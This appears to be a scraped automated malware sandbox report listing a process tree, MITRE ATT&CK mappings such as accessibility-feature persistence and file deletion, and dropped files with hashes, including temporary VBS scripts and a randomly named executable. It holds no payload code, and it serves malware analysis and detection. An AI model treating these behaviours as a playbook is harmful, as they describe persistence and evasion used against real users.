C:\Windows\System32\ATBroker.exe /start osk
1⤵
PID:5368
- C:\Windows\System32\osk.exe
  "C:\Windows\System32\osk.exe"
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:5400

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x50c 0x404
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Privilege Escalation

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
15c922eb377c3f0bbf8d93491b00eade

SHA1
659f4c7889112efb5d1d1bc77ff502d6d2ab90eb

SHA256
3925c6e7948b4a5d4d1a55352532eac0f68374521995a0e7e797d327b45808a9

SHA512
dcf73a9924562d1bc7b39174b55fd5a8f987a0f77caca14044bde35d6fd8eba331e5209ee509b3ef8028d813489844e594f9b1d1ee96a62d45d6491430d3993b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
a97ab55278a59948a5c526c6f11387db

SHA1
71a021ed1f5c5edd3948673f6b6fafe6b5387e2c

SHA256
4c924f6b7e32b952a7b9d1b61db5a6916995de708f3b5957961557e1b57c287f

SHA512
fd696eb0d1f1b745aa3ff4190a57fa4038ff89cb9b9ae0400791a2c58a2cfb5300ad351b1346ca341bbfda063783f9d6c49eeeeec6bda7f8df2a5aa07373f17b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3275b79e8797a6cfe50c388b3db6faf1

SHA1
dcb04fed985c02893d5f19cfdd6ad4eee58f84e0

SHA256
337f1ea425c4f124eaef20cb9bf3d04657b0153ce1f6719557fdf60926e53135

SHA512
26489a45a909cd1791053a922e2212b9d475c22635d118bba47a8e42b824bbb4b693306a6436f63fe8b6ec85f143f15eaa0a2427ee9534b49e1e00f0c0b702e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
983cbc1f706a155d63496ebc4d66515e

SHA1
223d0071718b80cad9239e58c5e8e64df6e2a2fe

SHA256
cc34b8f8e3f4bfe4c9a227d88f56ea2dd276ca3ac81df622ff5e9a8ec46b951c

SHA512
d9cf2ca46d9379902730c81e615a3eb694873ffd535c6bb3ded2dc97cdbbfb71051ab11a07754ed6f610f04285605b702b5a48a6cfda3ee3287230c41c9c45cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
111c361619c017b5d09a13a56938bd54

SHA1
e02b363a8ceb95751623f25025a9299a2c931e07

SHA256
d7be4042a1e3511b0dbf0ab5c493245e4ac314440a4ae0732813db01a21ef8bc

SHA512
fc16a4ad0b56899b82d05114d7b0ca8ee610cdba6ff0b6a67dea44faf17b3105109335359b78c0a59c9011a13152744a7f5d4f6a5b66ea519df750ef03f622b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
328B

MD5
b6812463c77e01959e29c6ea15b1d8f7

SHA1
5a911793e2e74e3e4879ef05798c30c2326e58a2

SHA256
c4ceee1233bc6b94d8e82b03c03325b0963e1d604d94eb71ac50a9785dd536c6

SHA512
761ebda41cd80d2e8007054058692e17ec290e5afec66872017e7ddb5bbd448afad91e9a2974a59c4fd66ca52156e94c5de382f9457180aa8ce20fed504476b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
e67c8876c0d5dfdebc10db736f348f0a

SHA1
9cd8bd1d12fc745fbbf768fcad39fe87a70d08d6

SHA256
3db897ce0dd4b22510d5e0ec0a1988e7ecd9794a9f6c52fba0e6fbd2f71a5448

SHA512
af13773b438b6ff484d053b92407c4f256068cd44f345247424fce0b88666e73721bda815070f8ef2f015ede219312d3015f25d823b5339aa1f058933c2c73c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
18f7d2364dfdc6f42445d3358e8de1ec

SHA1
e337a2410ea0183e84fd380bde98f99ba1f8af30

SHA256
b0712a37c80773467113684c7ae41fc387728fc272d9daf97c0f2d7e22e48470

SHA512
b2a27282354b55e822526987a26a28d776e94ba6f49c418ef9adf86f7324ec22b17a6e354c6007bb9059ee6b5b4847c8c2a87995d266e76d5259b808e359c211

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
347B

MD5
0fbaec3cc392d82640dfd129c8d89e2b

SHA1
3dec76ee05eee3a9c92b1b7241958b28976f9ce5

SHA256
5d3a29b157164dffaa31892f8262b2be8a06ccda7ed8feaa50945274be3cfd7a

SHA512
3623c9614f458d454b2a4288b0617c25c0cfe13ecbaf6519b00ef83e9149e89b7ebc773c2328b29f2db918e58425edb9179ec86a36c183fb79b71ac2eaf52241

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
323B

MD5
9fcace0b65ce9baa576a4fb616896df7

SHA1
2e4ec3c92b3d0e9c6c4b0b80128a98c3529a80bf

SHA256
8f9ea4a4976687fdd2b423c0348fab8711144c4b79662bc8ada3aaa3d4684793

SHA512
4a9d34084d037fb8c620b5926fc5c3294cecae2e3cca5b245d771c51f1d139a132e270cad609983832f8f2e835a699a154342187c79c74cb790aab802a79cdd7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
7848e62c5317c67ca8f9ef4173a33c45

SHA1
0614ccd3e54ed626bcbdd11bb083371cd090e499

SHA256
f1eec0d7f66672b426f8a4288b6133249e32cb00d9ddef46d35517ba20729676

SHA512
4858472814c3fa0b3d68509399729cf3650a7a006315c369828343693a8fcd1a660e1e0d74b41e2f12c668365ab0ae7b8442c51c77f8d4ce10a8641a4cd69af6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

Filesize
4B

MD5
d87a48f6b335cee0ba7eefc98ca59ca1

SHA1
de1ab839219bdffc41c0faf2d79a9cd8a066d65f

SHA256
6411c65c46e6019d997caa7af9d31cffabcff8ba6cd5aea599a6c6723d53323b

SHA512
ba91286801123746eab5bb88a686fdaee9dd34800c8e5fc2448a1c5cdd4486980cdd6a2994ef84cd8e1efd4842ee6a6f0720396305d98a2694974c60c7478ffe

Download Submit
C:\Users\Admin\AppData\Local\Temp\530436.vbs

Filesize
237B

MD5
749b3d1e69577d4130995e2ef38fdabc

SHA1
e255f3ba16aa8a17854eb644e323505fe001aecb

SHA256
0fbbc59eb44c022375167748ac5ac6fe8a802a878b2b5e42b7e060b07d558d33

SHA512
6f367bdc233288dcd20c0e5f5890be55e14e484e1b50c39f150425abb859f4e90e74298b6f940e57fd0de81479aaef23bfeb32985faf5382eeada78964a5bc30

Download Submit
C:\Users\Admin\AppData\Local\Temp\898748.vbs

Filesize
125B

MD5
8b4ed5c47fdddbeba260ef11cfca88c6

SHA1
868f11f8ed78ebe871f9da182d053f349834b017

SHA256
170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5

SHA512
87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\PwDxYIOvdRPkg9jcZILMX006.exe

Filesize
2.6MB

MD5
2c5bce46a7749eecedd086bfbf89e8d3

SHA1
034e3b0ea78420d127f86971a0950eaae0257299

SHA256
a629b7e77f99918079dd6e0843b6cd72135610ed173e821ddf9c2d7eb641c85f

SHA512
fec84327d6cea6c324850ea4dcb68b07ccfeb37f633e987cd9fb51d2a52942eeebb0682747ba97a90862e1eb923e85336c33041c8d373f40bfa12702085ad335

Download Submit
memory/2496-17-0x0000021796DC0000-0x0000021796DC1000-memory.dmp

Filesize
4KB

Download
memory/2496-13-0x0000021796DC0000-0x0000021796DC1000-memory.dmp

Filesize
4KB

Download
memory/2496-12-0x0000021796DC0000-0x0000021796DC1000-memory.dmp

Filesize
4KB

Download
memory/2496-15-0x0000021796DC0000-0x0000021796DC1000-memory.dmp

Filesize
4KB

Download
memory/2496-16-0x0000021796DC0000-0x0000021796DC1000-memory.dmp

Filesize
4KB

Download
memory/2496-8-0x0000021796DC0000-0x0000021796DC1000-memory.dmp

Filesize
4KB

Download
memory/2496-18-0x0000021796DC0000-0x0000021796DC1000-memory.dmp

Filesize
4KB

Download
memory/2496-14-0x0000021796DC0000-0x0000021796DC1000-memory.dmp

Filesize
4KB

Download
memory/2496-6-0x0000021796DC0000-0x0000021796DC1000-memory.dmp

Filesize
4KB

Download
memory/2496-7-0x0000021796DC0000-0x0000021796DC1000-memory.dmp

Filesize
4KB

Download
memory/4284-0-0x000001EE137B0000-0x000001EE137B1000-memory.dmp

Filesize
4KB

Download
memory/4284-4-0x000001EE13800000-0x000001EE13801000-memory.dmp

Filesize
4KB

Download
memory/4284-2-0x000001EE137E0000-0x000001EE137E1000-memory.dmp

Filesize
4KB

Download
memory/4284-1-0x000001EE137C0000-0x000001EE137C1000-memory.dmp

Filesize
4KB

Download